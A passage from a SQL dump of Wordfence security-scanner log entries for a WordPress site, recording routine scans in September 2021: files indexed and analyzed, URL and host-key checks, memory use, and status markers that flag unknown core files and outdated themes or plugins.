second'),(5258,1630787497.735980,2,'info','Scanned contents of 350 additional files at 31.26 per second'),(5259,1630787498.738692,2,'info','Scanned contents of 389 additional files at 31.89 per second'),(5260,1630787499.741947,2,'info','Scanned contents of 420 additional files at 31.81 per second'),(5261,1630787500.800280,2,'info','Scanned contents of 445 additional files at 31.20 per second'),(5262,1630787501.834845,2,'info','Scanned contents of 482 additional files at 31.51 per second'),(5263,1630787502.843622,2,'info','Scanned contents of 518 additional files at 31.77 per second'),(5264,1630787503.863096,2,'info','Scanned contents of 546 additional files at 31.52 per second'),(5265,1630787504.864971,2,'info','Scanned contents of 588 additional files at 32.09 per second'),(5266,1630787505.902140,2,'info','Scanned contents of 609 additional files at 31.45 per second'),(5267,1630787506.907470,2,'info','Scanned contents of 646 additional files at 31.72 per second'),(5268,1630787507.939676,2,'info','Scanned contents of 682 additional files at 31.87 per second'),(5269,1630787509.029634,2,'info','Scanned contents of 713 additional files at 31.70 per second'),(5270,1630787510.697069,2,'info','Scanned contents of 735 additional files at 30.42 per second'),(5271,1630787511.697069,2,'info','Scanned contents of 772 additional files at 30.69 per second'),(5272,1630787512.703374,2,'info','Scanned contents of 805 additional files at 30.77 per second'),(5273,1630787513.706529,2,'info','Scanned contents of 840 additional files at 30.92 per second'),(5274,1630787514.783430,2,'info','Scanned contents of 874 additional files at 30.94 per second'),(5275,1630787515.810086,2,'info','Scanned contents of 902 additional files at 30.82 per second'),(5276,1630787516.855352,2,'info','Scanned contents of 930 additional files at 30.68 per second'),(5277,1630787517.862601,2,'info','Scanned contents of 962 additional files at 30.71 per second'),(5278,1630787518.883712,2,'info','Scanned contents of 998 additional files at 30.86 per second'),(5279,1630787519.888638,2,'info','Scanned contents of 1035 additional files at 31.03 per second'),(5280,1630787521.042059,2,'info','Scanned contents of 1062 additional files at 30.78 per second'),(5281,1630787522.136397,2,'info','Scanned contents of 1089 additional files at 30.59 per second'),(5282,1630787523.171461,2,'info','Scanned contents of 1118 additional files at 30.52 per second'),(5283,1630787524.177539,2,'info','Scanned contents of 1152 additional files at 30.61 per second'),(5284,1630787525.197373,2,'info','Scanned contents of 1187 additional files at 30.70 per second'),(5285,1630787526.826125,2,'info','Scanned contents of 1217 additional files at 30.21 per second'),(5286,1630787527.832848,2,'info','Scanned contents of 1243 additional files at 30.10 per second'),(5287,1630787528.843456,2,'info','Scanned contents of 1263 additional files at 29.86 per second'),(5288,1630787529.866959,2,'info','Scanned contents of 1297 additional files at 29.93 per second'),(5289,1630787530.323300,2,'info','Scanned contents of 1316 additional files at 30.06 per second'),(5290,1630787530.333590,2,'info','Asking Wordfence to check URLs against malware list.'),(5291,1630787530.338749,2,'info','Checking 3281 host keys against Wordfence scanning servers.'),(5292,1630787531.099691,2,'info','Done host key check.'),(5293,1630787531.283242,2,'info','Done file contents scan'),(5299,1630787531.843938,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(5300,1630787531.873346,2,'info','Checking 373 host keys against Wordfence scanning servers.'),(5301,1630787532.640305,2,'info','Done host key check.'),(5302,1630787532.665220,2,'info','Done examining URLs'),(5307,1630787533.216762,2,'info','Starting password strength check on 0 users.'),(5314,1630787536.931755,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(5315,1630787536.933775,2,'info','Done examining URLs'),(5317,1630787537.118340,1,'info','-------------------'),(5318,1630787537.139938,2,'info','Wordfence used 21.56 MB of memory for scan. Server peak memory usage was: 43.56 MB'),(5319,1630787537.141822,1,'info','Scan Complete. Scanned 7058 files, 5 plugins, 31 themes, 13 posts, 0 comments and 3841 URLs in 5 minutes.'),(5322,1630838503.730650,1,'info','Initiating quick scan'),(5327,1630838508.186340,1,'info','-------------------'),(5328,1630838508.355332,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5329,1630838508.434693,1,'info','Quick Scan Complete. Scanned in 5 seconds.'),(5332,1630928441.206725,1,'info','Initiating quick scan'),(5337,1630928441.759390,1,'info','-------------------'),(5338,1630928441.788124,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5339,1630928441.799567,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5342,1631010746.104528,1,'info','Initiating quick scan'),(5347,1631010746.847610,1,'info','-------------------'),(5348,1631010746.860936,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 8 MB'),(5349,1631010746.878094,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5351,1631046150.006682,1,'info','Scheduled Wordfence scan starting at Tuesday 7th of September 2021 08:22:30 PM'),(5353,1631046150.652313,1,'info','Contacting Wordfence to initiate scan'),(5360,1631046158.642630,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(5361,1631046158.655169,2,'info','The disk has 3458890.32 MB available'),(5369,1631046158.947447,2,'info','Getting plugin list from WordPress'),(5370,1631046158.973515,2,'info','Found 4 plugins'),(5371,1631046158.984428,2,'info','Getting theme list from WordPress'),(5372,1631046159.007200,2,'info','Found 31 themes'),(5384,1631046162.872472,2,'info','500 files indexed'),(5385,1631046163.042037,2,'info','1000 files indexed'),(5386,1631046163.160336,2,'info','1500 files indexed'),(5387,1631046163.273619,2,'info','2000 files indexed'),(5388,1631046163.374200,2,'info','2500 files indexed'),(5389,1631046163.497235,2,'info','3000 files indexed'),(5390,1631046163.574800,2,'info','3500 files indexed'),(5391,1631046163.664399,2,'info','4000 files indexed'),(5392,1631046163.748545,2,'info','4500 files indexed'),(5393,1631046163.954063,2,'info','5000 files indexed'),(5394,1631046164.012918,2,'info','5500 files indexed'),(5395,1631046164.175384,2,'info','6000 files indexed'),(5396,1631046164.295804,2,'info','6500 files indexed'),(5397,1631046164.497170,2,'info','7000 files indexed'),(5398,1631046164.515853,2,'info','7058 files indexed'),(5399,1631046169.240460,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(5400,1631046172.114063,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(5401,1631046175.551885,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(5402,1631046179.813848,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(5403,1631046182.761601,2,'info','Analyzed 500 files containing 8.09 MB of data so far'),(5404,1631046186.396387,2,'info','Analyzed 600 files containing 8.94 MB of data so far'),(5405,1631046190.407165,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(5406,1631046194.497353,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(5407,1631046197.865623,2,'info','Analyzed 900 files containing 12.87 MB of data so far'),(5408,1631046201.937798,2,'info','Analyzed 1000 files containing 18.33 MB of data so far'),(5409,1631046205.530975,2,'info','Analyzed 1100 files containing 19.81 MB of data so far'),(5410,1631046208.101970,2,'info','Analyzed 1200 files containing 21.37 MB of data so far'),(5411,1631046209.615956,2,'info','Analyzed 1300 files containing 21.71 MB of data so far'),(5412,1631046213.066366,2,'info','Analyzed 1400 files containing 22.65 MB of data so far'),(5413,1631046214.919284,2,'info','Analyzed 1500 files containing 22.68 MB of data so far'),(5414,1631046217.586217,2,'info','Analyzed 1600 files containing 22.71 MB of data so far'),(5415,1631046220.463170,2,'info','Analyzed 1700 files containing 24.06 MB of data so far'),(5416,1631046223.557847,2,'info','Analyzed 1800 files containing 24.7 MB of data so far'),(5417,1631046225.584441,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(5418,1631046227.823474,2,'info','Analyzed 2000 files containing 27.51 MB of data so far'),(5419,1631046229.580205,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(5420,1631046231.943364,2,'info','Analyzed 2200 files containing 30.3 MB of data so far'),(5421,1631046234.001169,2,'info','Analyzed 2300 files containing 32.72 MB of data so far'),(5422,1631046236.095682,2,'info','Analyzed 2400 files containing 34.44 MB of data so far'),(5423,1631046238.333827,2,'info','Analyzed 2500 files containing 35.38 MB of data so far'),(5424,1631046242.604176,2,'info','Analyzed 2600 files containing 36.27 MB of data so far'),(5425,1631046245.291485,2,'info','Analyzed 2700 files containing 39.94 MB of data so far'),(5426,1631046247.867212,2,'info','Analyzed 2800 files containing 41.31 MB of data so far'),(5427,1631046250.938066,2,'info','Analyzed 2900 files containing 43.38 MB of data so far'),(5428,1631046253.281336,2,'info','Analyzed 3000 files containing 46.43 MB of data so far'),(5429,1631046255.002167,2,'info','Analyzed 3100 files containing 48.47 MB of data so far'),(5430,1631046257.083474,2,'info','Analyzed 3200 files containing 53.86 MB of data so far'),(5431,1631046259.806858,2,'info','Analyzed 3300 files containing 54.73 MB of data so far'),(5432,1631046261.661495,2,'info','Analyzed 3400 files containing 55.15 MB of data so far'),(5433,1631046264.544794,2,'info','Analyzed 3500 files containing 57 MB of data so far'),(5434,1631046266.475290,2,'info','Analyzed 3600 files containing 58.95 MB of data so far'),(5435,1631046269.786115,2,'info','Analyzed 3700 files containing 61.75 MB of data so far'),(5436,1631046272.609584,2,'info','Analyzed 3800 files containing 62.85 MB of data so far'),(5437,1631046274.459138,2,'info','Analyzed 3900 files containing 65.39 MB of data so far'),(5438,1631046276.132811,2,'info','Analyzed 4000 files containing 71.97 MB of data so far'),(5439,1631046278.260868,2,'info','Analyzed 4100 files containing 73.58 MB of data so far'),(5440,1631046281.448166,2,'info','Analyzed 4200 files containing 77.06 MB of data so far'),(5441,1631046283.452073,2,'info','Analyzed 4300 files containing 78.51 MB of data so far'),(5442,1631046285.433304,2,'info','Analyzed 4400 files containing 79.56 MB of data so far'),(5443,1631046287.572830,2,'info','Analyzed 4500 files containing 81.16 MB of data so far'),(5444,1631046290.412902,2,'info','Analyzed 4600 files containing 84.74 MB of data so far'),(5445,1631046295.690233,2,'info','Analyzed 4700 files containing 85.53 MB of data so far'),(5446,1631046298.195549,2,'info','Analyzed 4800 files containing 86.32 MB of data so far'),(5447,1631046301.439782,2,'info','Analyzed 4900 files containing 88.26 MB of data so far'),(5448,1631046306.116816,2,'info','Analyzed 5000 files containing 90.83 MB of data so far'),(5449,1631046308.931465,2,'info','Analyzed 5100 files containing 92.27 MB of data so far'),(5450,1631046312.817397,2,'info','Analyzed 5200 files containing 101.18 MB of data so far'),(5451,1631046317.181559,2,'info','Analyzed 5300 files containing 107.16 MB of data so far'),(5452,1631046321.177461,2,'info','Analyzed 5400 files containing 108.5 MB of data so far'),(5453,1631046324.989530,2,'info','Analyzed 5500 files containing 110.91 MB of data so far'),(5454,1631046329.447719,2,'info','Analyzed 5600 files containing 114.89 MB of data so far'),(5455,1631046334.272448,2,'info','Analyzed 5700 files containing 116.69 MB of data so far'),(5456,1631046338.204571,2,'info','Analyzed 5800 files containing 118.08 MB of data so far'),(5457,1631046342.557195,2,'info','Analyzed 5900 files containing 119.92 MB of data so far'),(5458,1631046347.209244,2,'info','Analyzed 6000 files containing 120.62 MB of data so far'),(5459,1631046352.193173,2,'info','Analyzed 6100 files containing 122.21 MB of data so far'),(5460,1631046355.500514,2,'info','Analyzed 6200 files containing 125.21 MB of data so far'),(5461,1631046358.926647,2,'info','Analyzed 6300 files containing 126.86 MB of data so far'),(5462,1631046364.312753,2,'info','Analyzed 6400 files containing 128.47 MB of data so far'),(5463,1631046369.034363,2,'info','Analyzed 6500 files containing 139.18 MB of data so far'),(5464,1631046373.063843,2,'info','Analyzed 6600 files containing 142.69 MB of data so far'),(5465,1631046377.291225,2,'info','Analyzed 6700 files containing 144.98 MB of data so far'),(5466,1631046380.869759,2,'info','Analyzed 6800 files containing 147.73 MB of data so far'),(5467,1631046384.314292,2,'info','Analyzed 6900 files containing 150.83 MB of data so far'),(5468,1631046388.213405,2,'info','Analyzed 7000 files containing 151.97 MB of data so far'),(5469,1631046390.563350,2,'info','Analyzed 7058 files containing 153.05 MB of data.'),(5477,1631046392.463111,2,'info','Starting scan of file contents'),(5478,1631046394.052589,2,'info','Scanned contents of 18 additional files at 17.65 per second'),(5479,1631046395.071450,2,'info','Scanned contents of 40 additional files at 19.62 per second'),(5480,1631046396.102532,2,'info','Scanned contents of 66 additional files at 21.50 per second'),(5481,1631046398.409219,2,'info','Scanned contents of 71 additional files at 13.21 per second'),(5482,1631046399.421063,2,'info','Scanned contents of 87 additional files at 13.62 per second'),(5483,1631046400.454434,2,'info','Scanned contents of 113 additional files at 15.23 per second'),(5484,1631046401.469738,2,'info','Scanned contents of 159 additional files at 18.85 per second'),(5485,1631046402.592795,2,'info','Scanned contents of 200 additional files at 20.92 per second'),(5486,1631046403.599473,2,'info','Scanned contents of 241 additional files at 22.81 per second'),(5487,1631046404.614050,2,'info','Scanned contents of 275 additional files at 23.75 per second'),(5488,1631046405.617602,2,'info','Scanned contents of 304 additional files at 24.16 per second'),(5489,1631046406.634130,2,'info','Scanned contents of 334 additional files at 24.56 per second'),(5490,1631046407.634670,2,'info','Scanned contents of 376 additional files at 25.75 per second'),(5491,1631046408.639640,2,'info','Scanned contents of 419 additional files at 26.85 per second'),(5492,1631046409.692077,2,'info','Scanned contents of 438 additional files at 26.29 per second'),(5493,1631046410.696992,2,'info','Scanned contents of 487 additional files at 27.57 per second'),(5494,1631046411.712893,2,'info','Scanned contents of 525 additional files at 28.10 per second'),(5495,1631046412.714466,2,'info','Scanned contents of 554 additional files at 28.15 per second'),(5496,1631046413.716460,2,'info','Scanned contents of 585 additional files at 28.28 per second'),(5497,1631046414.749743,2,'info','Scanned contents of 631 additional files at 29.06 per second'),(5498,1631046415.784231,2,'info','Scanned contents of 672 additional files at 29.54 per second'),(5499,1631046416.810029,2,'info','Scanned contents of 713 additional files at 29.99 per second'),(5500,1631046417.815514,2,'info','Scanned contents of 752 additional files at 30.34 per second'),(5501,1631046418.825624,2,'info','Scanned contents of 798 additional files at 30.94 per second'),(5502,1631046419.877187,2,'info','Scanned contents of 821 additional files at 30.58 per second'),(5503,1631046420.889966,2,'info','Scanned contents of 859 additional files at 30.84 per second'),(5504,1631046421.910850,2,'info','Scanned contents of 903 additional files at 31.27 per second'),(5505,1631046422.919563,2,'info','Scanned contents of 946 additional files at 31.65 per second'),(5506,1631046423.924684,2,'info','Scanned contents of 986 additional files at 31.92 per second'),(5507,1631046424.940465,2,'info','Scanned contents of 1025 additional files at 32.12 per second'),(5508,1631046425.946474,2,'info','Scanned contents of 1033 additional files at 31.39 per second'),(5509,1631046426.962558,2,'info','Scanned contents of 1062 additional files at 31.30 per second'),(5510,1631046428.014270,2,'info','Scanned contents of 1096 additional files at 31.33 per second'),(5511,1631046429.023478,2,'info','Scanned contents of 1133 additional files at 31.48 per second'),(5512,1631046430.027190,2,'info','Scanned contents of 1187 additional files at 32.09 per second'),(5513,1631046431.041196,2,'info','Scanned contents of 1215 additional files at 31.97 per second'),(5514,1631046432.044229,2,'info','Scanned contents of 1255 additional files at 32.17 per second'),(5515,1631046433.051190,2,'info','Scanned contents of 1291 additional files at 32.26 per second'),(5516,1631046434.038802,2,'info','Scanned contents of 1316 additional files at 32.09 per second'),(5517,1631046434.049522,2,'info','Asking Wordfence to check URLs against malware list.'),(5518,1631046434.058210,2,'info','Checking 3281 host keys against Wordfence scanning servers.'),(5519,1631046434.813137,2,'info','Done host key check.'),(5520,1631046435.020445,2,'info','Done file contents scan'),(5526,1631046435.302189,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(5527,1631046435.305254,2,'info','Checking 373 host keys against Wordfence scanning servers.'),(5528,1631046436.044163,2,'info','Done host key check.'),(5529,1631046436.055448,2,'info','Done examining URLs'),(5534,1631046436.751118,2,'info','Starting password strength check on 0 users.'),(5541,1631046440.669368,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(5542,1631046440.671860,2,'info','Done examining URLs'),(5544,1631046440.776226,1,'info','-------------------'),(5545,1631046440.778218,2,'info','Wordfence used 23.55 MB of memory for scan. Server peak memory usage was: 47.55 MB'),(5546,1631046440.788146,1,'info','Scan Complete. Scanned 7058 files, 5 plugins, 31 themes, 13 posts, 0 comments and 3841 URLs in 4 minutes 49 seconds.'),(5549,1631097906.324380,1,'info','Initiating quick scan'),(5554,1631097906.789078,1,'info','-------------------'),(5555,1631097906.793271,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5556,1631097906.801112,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5559,1631183766.561346,1,'info','Initiating quick scan'),(5564,1631183766.896936,1,'info','-------------------'),(5565,1631183766.900960,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5566,1631183766.903102,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5569,1631274333.427297,1,'info','Initiating quick scan'),(5574,1631274333.954426,1,'info','-------------------'),(5575,1631274333.986382,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 22 MB'),(5576,1631274333.997230,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(5578,1631305251.605824,1,'info','Scheduled Wordfence scan starting at Friday 10th of September 2021 08:20:51 PM'),(5580,1631305252.133780,1,'info','Contacting Wordfence to initiate scan'),(5587,1631305262.659344,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(5588,1631305262.665927,2,'info','The disk has 3458212.34 MB available'),(5596,1631305262.921984,2,'info','Getting plugin list from WordPress'),(5597,1631305262.968484,2,'info','Found 4 plugins'),(5598,1631305263.005168,2,'info','Getting theme list from WordPress'),(5599,1631305263.022422,2,'info','Found 31 themes'),(5602,1631305265.303769,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(5603,1631305265.315778,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(5604,1631305265.388823,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(5605,1631305265.399930,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(5606,1631305265.452849,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(5607,1631305265.475075,10,'info','SUM_DISABLED:Skipping theme scan'),(5608,1631305265.478035,10,'info','SUM_DISABLED:Skipping plugin scan'),(5609,1631305265.499717,10,'info','SUM_START:Scanning for known malware files'),(5610,1631305265.537282,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(5611,1631305265.684672,2,'info','500 files indexed'),(5612,1631305265.800145,2,'info','1000 files indexed'),(5613,1631305265.939657,2,'info','1500 files indexed'),(5614,1631305266.023314,2,'info','2000 files indexed'),(5615,1631305266.089197,2,'info','2500 files indexed'),(5616,1631305266.180294,2,'info','3000 files indexed'),(5617,1631305266.284181,2,'info','3500 files indexed'),(5618,1631305266.338522,2,'info','4000 files indexed'),(5619,1631305266.388327,2,'info','4500 files indexed'),(5620,1631305266.628522,2,'info','5000 files indexed'),(5621,1631305266.708643,2,'info','5500 files indexed'),(5622,1631305266.781445,2,'info','6000 files indexed'),(5623,1631305266.887148,2,'info','6500 files indexed'),(5624,1631305267.089214,2,'info','7000 files indexed'),(5625,1631305267.112509,2,'info','7061 files indexed'),(5626,1631305271.119776,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(5627,1631305274.059558,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(5628,1631305276.556021,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(5629,1631305279.083300,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(5630,1631305281.261502,2,'info','Analyzed 500 files containing 8.09 MB of data so far'),(5631,1631305284.132310,2,'info','Analyzed 600 files containing 8.94 MB of data so far'),(5632,1631305290.223686,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(5633,1631305293.697262,2,'info','Analyzed 800 files containing 11.1 MB of data so far'),(5634,1631305297.410488,2,'info','Analyzed 900 files containing 12.87 MB of data so far'),(5635,1631305300.523213,2,'info','Analyzed 1000 files containing 18.33 MB of data so far'),(5636,1631305303.613841,2,'info','Analyzed 1100 files containing 19.81 MB of data so far'),(5637,1631305307.376311,2,'info','Analyzed 1200 files containing 21.37 MB of data so far'),(5638,1631305308.571376,2,'info','Analyzed 1300 files containing 21.71 MB of data so far'),(5639,1631305311.154223,2,'info','Analyzed 1400 files containing 22.65 MB of data so far'),(5640,1631305315.318545,2,'info','Analyzed 1500 files containing 22.68 MB of data so far'),(5641,1631305317.231679,2,'info','Analyzed 1600 files containing 22.71 MB of data so far'),(5642,1631305320.532526,2,'info','Analyzed 1700 files containing 24.06 MB of data so far'),(5643,1631305322.643543,2,'info','Analyzed 1800 files containing 24.7 MB of data so far'),(5644,1631305324.905063,2,'info','Analyzed 1900 files containing 27.12 MB of data so far'),(5645,1631305326.801985,2,'info','Analyzed 2000 files containing 27.51 MB of data so far'),(5646,1631305328.060236,2,'info','Analyzed 2100 files containing 28.11 MB of data so far'),(5647,1631305329.599014,2,'info','Analyzed 2200 files containing 30.3 MB of data so far'),(5648,1631305331.307042,2,'info','Analyzed 2300 files containing 32.73 MB of data so far'),(5649,1631305332.522124,2,'info','Analyzed 2400 files containing 34.44 MB of data so far'),(5650,1631305333.678432,2,'info','Analyzed 2500 files containing 35.38 MB of data so far'),(5651,1631305336.670483,2,'info','Analyzed 2600 files containing 36.27 MB of data so far'),(5652,1631305340.899895,2,'info','Analyzed 2700 files containing 39.94 MB of data so far'),(5653,1631305343.947555,2,'info','Analyzed 2800 files containing 41.31 MB of data so far'),(5654,1631305345.457034,2,'info','Analyzed 2900 files containing 43.39 MB of data so far'),(5655,1631305347.663215,2,'info','Analyzed 3000 files containing 46.43 MB of data so far'),(5656,1631305348.968911,2,'info','Analyzed 3100 files containing 48.47 MB of data so far'),(5657,1631305351.283468,2,'info','Analyzed 3200 files containing 53.86 MB of data so far'),(5658,1631305352.825029,2,'info','Analyzed 3300 files containing 54.73 MB of data so far'),(5659,1631305354.265747,2,'info','Analyzed 3400 files containing 55.15 MB of data so far'),(5660,1631305358.282186,2,'info','Analyzed 3500 files containing 57.01 MB of data so far'),(5661,1631305360.559393,2,'info','Analyzed 3600 files containing 58.95 MB of data so far'),(5662,1631305361.696212,2,'info','Analyzed 3700 files containing 61.75 MB of data so far'),(5663,1631305363.358345,2,'info','Analyzed 3800 files containing 62.85 MB of data so far'),(5664,1631305365.933051,2,'info','Analyzed 3900 files containing 65.39 MB of data so far'),(5665,1631305368.061869,2,'info','Analyzed 4000 files containing 71.97 MB of data so far'),(5666,1631305370.775564,2,'info','Analyzed 4100 files containing 73.58 MB of data so far'),(5667,1631305372.194850,2,'info','Analyzed 4200 files containing 77.06 MB of data so far'),(5668,1631305373.695722,2,'info','Analyzed 4300 files containing 78.51 MB of data so far'),(5669,1631305377.860544,2,'info','Analyzed 4400 files containing 79.56 MB of data so far'),(5670,1631305380.568658,2,'info','Analyzed 4500 files containing 81.16 MB of data so far'),(5671,1631305382.827228,2,'info','Analyzed 4600 files containing 84.74 MB of data so far'),(5672,1631305385.926240,2,'info','Analyzed 4700 files containing 85.53 MB of data so far'),(5673,1631305388.421286,2,'info','Analyzed 4800 files containing 86.32 MB of data so far'),(5674,1631305391.300999,2,'info','Analyzed 4900 files containing 88.26 MB of data so far'),(5675,1631305393.950095,2,'info','Analyzed 5000 files containing 90.83 MB of data so far'),(5676,1631305400.393640,2,'info','Analyzed 5100 files containing 92.27 MB of data so far'),(5677,1631305403.378004,2,'info','Analyzed 5200 files containing 101.21 MB of data so far'),(5678,1631305406.353801,2,'info','Analyzed 5300 files containing 107.19 MB of data so far'),(5679,1631305409.286897,2,'info','Analyzed 5400 files containing 108.53 MB of data so far'),(5680,1631305412.571156,2,'info','Analyzed 5500 files containing 110.94 MB of data so far'),(5681,1631305416.871206,2,'info','Analyzed 5600 files containing 114.92 MB of data so far'),(5682,1631305419.121837,2,'info','Analyzed 5700 files containing 116.73 MB of data so far'),(5683,1631305422.147340,2,'info','Analyzed 5800 files containing 118.08 MB of data so far'),(5684,1631305425.290177,2,'info','Analyzed 5900 files containing 120.03 MB of data so far'),(5685,1631305428.287880,2,'info','Analyzed 6000 files containing 120.74 MB of data so far'),(5686,1631305432.150439,2,'info','Analyzed 6100 files containing 122.27 MB of data so far'),(5687,1631305434.602332,2,'info','Analyzed 6200 files containing 125.28 MB of data so far'),(5688,1631305437.427228,2,'info','Analyzed 6300 files containing 126.95 MB of data so far'),(5689,1631305439.994225,2,'info','Analyzed 6400 files containing 128.56 MB of data so far'),(5690,1631305443.408973,2,'info','Analyzed 6500 files containing 139.27 MB of data so far'),(5691,1631305446.084176,2,'info','Analyzed 6600 files containing 142.81 MB of data so far'),(5692,1631305451.302067,2,'info','Analyzed 6700 files containing 145.05 MB of data so far'),(5693,1631305454.994553,2,'info','Analyzed 6800 files containing 147.84 MB of data so far'),(5694,1631305457.104020,2,'info','Analyzed 6900 files containing 150.92 MB of data so far'),(5695,1631305459.236918,2,'info','Analyzed 7000 files containing 152.07 MB of data so far'),(5696,1631305460.901628,2,'info','Analyzed 7061 files containing 153.17 MB of data.'),(5697,1631305460.912896,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(5698,1631305460.954531,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(5699,1631305460.979042,10,'info','SUM_ENDOK:Scanning for known malware files'),(5700,1631305461.021015,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(5701,1631305461.034681,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(5702,1631305461.072827,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(5703,1631305461.087397,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(5704,1631305462.531944,2,'info','Starting scan of file contents'),(5705,1631305464.162462,2,'info','Scanned contents of 16 additional files at 10.05 per second'),(5706,1631305465.177076,2,'info','Scanned contents of 55 additional files at 21.10 per second'),(5707,1631305466.183655,2,'info','Scanned contents of 122 additional files at 33.76 per second'),(5708,1631305467.187625,2,'info','Scanned contents of 178 additional files at 38.55 per second'),(5709,1631305468.218696,2,'info','Scanned contents of 225 additional files at 39.83 per second'),(5710,1631305469.243289,2,'info','Scanned contents of 280 additional files at 41.96 per second'),(5711,1631305470.244095,2,'info','Scanned contents of 335 additional files at 43.65 per second'),(5712,1631305471.267890,2,'info','Scanned contents of 379 additional files at 43.57 per second'),(5713,1631305472.322836,2,'info','Scanned contents of 397 additional files at 40.71 per second'),(5714,1631305473.332681,2,'info','Scanned contents of 435 additional files at 40.42 per second'),(5715,1631305474.414437,2,'info','Scanned contents of 494 additional files at 41.71 per second'),(5716,1631305475.694961,2,'info','Scanned contents of 497 additional files at 37.87 per second'),(5717,1631305477.006231,2,'info','Scanned contents of 501 additional files at 34.70 per second'),(5718,1631305478.056922,2,'info','Scanned contents of 525 additional files at 33.90 per second'),(5719,1631305479.066368,2,'info','Scanned contents of 555 additional files at 33.64 per second'),(5720,1631305480.602329,2,'info','Scanned contents of 599 additional files at 33.22 per second'),(5721,1631305481.615048,2,'info','Scanned contents of 632 additional files at 33.18 per second'),(5722,1631305482.649718,2,'info','Scanned contents of 661 additional files at 32.92 per second'),(5723,1631305483.662141,2,'info','Scanned contents of 678 additional files at 32.14 per second'),(5724,1631305484.662538,2,'info','Scanned contents of 731 additional files at 33.09 per second'),(5725,1631305485.704488,2,'info','Scanned contents of 785 additional files at 33.93 per second'),(5726,1631305486.731309,2,'info','Scanned contents of 818 additional files at 33.86 per second'),(5727,1631305487.745378,2,'info','Scanned contents of 861 additional files at 34.20 per second'),(5728,1631305488.804907,2,'info','Scanned contents of 890 additional files at 33.92 per second'),(5729,1631305489.867784,2,'info','Scanned contents of 915 additional files at 33.52 per second'),(5730,1631305491.084582,2,'info','Scanned contents of 962 additional files at 33.74 per second'),(5731,1631305492.104608,2,'info','Scanned contents of 994 additional files at 33.66 per second'),(5732,1631305493.126289,2,'info','Scanned contents of 1054 additional files at 34.49 per second'),(5733,1631305494.152412,2,'info','Scanned contents of 1087 additional files at 34.42 per second'),(5734,1631305495.161016,2,'info','Scanned contents of 1119 additional files at 34.33 per second'),(5735,1631305496.721849,2,'info','Scanned contents of 1183 additional files at 34.64 per second'),(5736,1631305497.749604,2,'info','Scanned contents of 1208 additional files at 34.34 per second'),(5737,1631305498.771882,2,'info','Scanned contents of 1233 additional files at 34.06 per second'),(5738,1631305499.828011,2,'info','Scanned contents of 1279 additional files at 34.33 per second'),(5739,1631305500.821003,2,'info','Scanned contents of 1316 additional files at 34.40 per second'),(5740,1631305500.832409,2,'info','Asking Wordfence to check URLs against malware list.'),(5741,1631305500.845897,2,'info','Checking 3281 host keys against Wordfence scanning servers.'),(5742,1631305501.625686,2,'info','Done host key check.'),(5743,1631305501.873744,2,'info','Done file contents scan'),(5744,1631305501.878850,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(5745,1631305501.950469,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blocklist'),(5746,1631305502.018470,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(5747,1631305502.024438,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(5748,1631305502.042443,10,'info','SUM_START:Scanning posts for URLs on a domain blocklist'),(5749,1631305502.145953,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(5750,1631305502.149313,2,'info','Checking 373 host keys against Wordfence scanning servers.'),(5751,1631305502.895590,2,'info','Done host key check.'),(5752,1631305502.906738,2,'info','Done examining URLs'),(5753,1631305503.098063,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blocklist'),(5754,1631305503.120772,10,'info','SUM_START:Scanning comments for URLs on a domain blocklist'),(5755,1631305503.212728,10,'info','SUM_ENDOK:Scanning comments for URLs on a domain blocklist'),(5756,1631305503.234589,10,'info','SUM_START:Scanning for weak passwords'),(5757,1631305503.244053,2,'info','Starting password strength check on 0 users.'),(5758,1631305503.249864,10,'info','SUM_ENDOK:Scanning for weak passwords'),(5759,1631305503.265235,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(5760,1631305506.008402,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core 